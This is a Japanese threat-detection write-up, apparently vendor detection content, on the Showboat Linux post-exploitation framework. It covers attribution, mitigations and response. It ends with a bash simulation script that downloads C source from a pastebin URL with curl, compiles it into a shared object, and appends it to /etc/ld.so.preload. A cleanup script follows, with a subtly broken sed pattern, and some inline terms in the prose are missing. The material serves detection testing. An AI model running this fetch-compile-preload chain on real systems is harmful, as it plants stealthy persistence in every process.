ショーボートマルウェアが2022年以来中東の通信企業を標的に
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Showboatは、AMD x86-64環境向けに構築されたモジュラー型のLinuxポスト・エクスプロイテーションフレームワークです。2022年中頃から活動しており、侵害されたネットワーク内で静かに長期間アクセスを維持することを目的としています。このマルウェアは、悪意のあるプロセスを隠すためにXOR暗号化と動的リンカの悪用を含む高度な回避方法を使用しています。
調査
調査の結果、コマンドアンドコントロールインフラストラクチャが中国成都にあることが追跡され、観察された戦術、技術、手順と共に、PRCに関連する脅威アクターへのリンクが示唆されました。技術分析によると、このマルウェアはその設定を復号化するためにハードコーディングされたXORキーに依存しており、 ld.so.preload を悪用して感染したシステムでのステルス性を実現しています。
緩和策
防御者は、 /etc/ld.so.preload への無許可の変更や、プロダクションLinuxホスト上での gcc コンパイラの不審な使用を監視する必要があります。また、ビーコン動作をランダム化されたタイミングでも識別できるネットワーク監視を展開し、重要なシステムライブラリの整合性監視を使用することを推奨します。
対応
Showboatアクティビティが検出された場合、影響を受けたLinuxシステムをすぐにネットワークから隔離してさらなるコマンドアンドコントロールのトラフィックを停止させます。メモリフォレンジックスを実行して注入された共有オブジェクトを特定し、すべての永続性メカニズムが削除されたことを確認するためにシステム設定とスケジュールされたタスクの完全な監査を実行します。
攻撃フロー
シミュレーションの実行
前提条件: テレメトリーとベースラインのプレフライトチェックが通過している必要があります。
根拠: このセクションは、検知ルールをトリガーするために設計された敵社技術(TTP)の正確な実行を詳細に説明します。コマンドとストーリーは、特定されたTTPを直接反映し、検知ロジックによって期待される正確なテレメトリーを生成することを目指さなければなりません。抽象的または無関係な例は誤診につながります。
-
攻撃の詳細とコマンド: 攻撃者はシステムコールの永続的なインターセプトを確立することを目指しています。彼らはまず
curlを使用してPastebinの生のURLから悪意のあるCソースファイルをダウンロードすることから開始します。ダウンロードが完了すると、gccを使用して、-sharedand-fPICフラグを使用してソースをコンパイルし、という名前の共有オブジェクトファイルにします。最終的に、このライブラリをすべてのプロセスに注入する意図で、そのパスをに追記します。このシーケンスは、システム上のすべてのプロセスに悪意のあるライブラリを注入することを目的としています。/etc/ld.so.preload. -
回帰テストスクリプト:
#!/bin/bash # ShowboatマルウェアTTPsのシミュレーション # 1. PastebinからCソースを取得するシミュレーション # 注意: 本物のraw pastebinリンク(ロジック用にモック)を使用するか、文字列をシミュレーション echo "モックのpastebinダウンロードシミュレーションを作成中..." echo 'void __attribute__((constructor)) init() {}' > fake_malware.c # このコマンドは'rule'の'選択_fetch'部分をトリガーします curl -s https://pastebin.com/raw/example_id -o fake_malware.c # 2. 共有オブジェクトのコンパイルをシミュレーション # このコマンドは'selection_compile'部分をトリガーします # (selection_fetch AND selection_compile) gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c # 3. ld.so.preloadの修正をシミュレーション # このコマンドは'selection_preload'部分をトリガーします echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload echo "シミュレーション完了。SIEMでアラートを確認してください。" -
クリーンアップコマンド:
#!/bin/bash # シミュレーションアーティファクトのクリーンアップ # 悪意のあるライブラリとソースを削除 sudo rm -f /tmp/malicious.so rm -f fake_malware.c # ld.so.preloadからエントリを削除(注意が必要) # このsedコマンドは/tmp/malicious.soを含む行を削除します sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload echo "クリーンアップ完了。"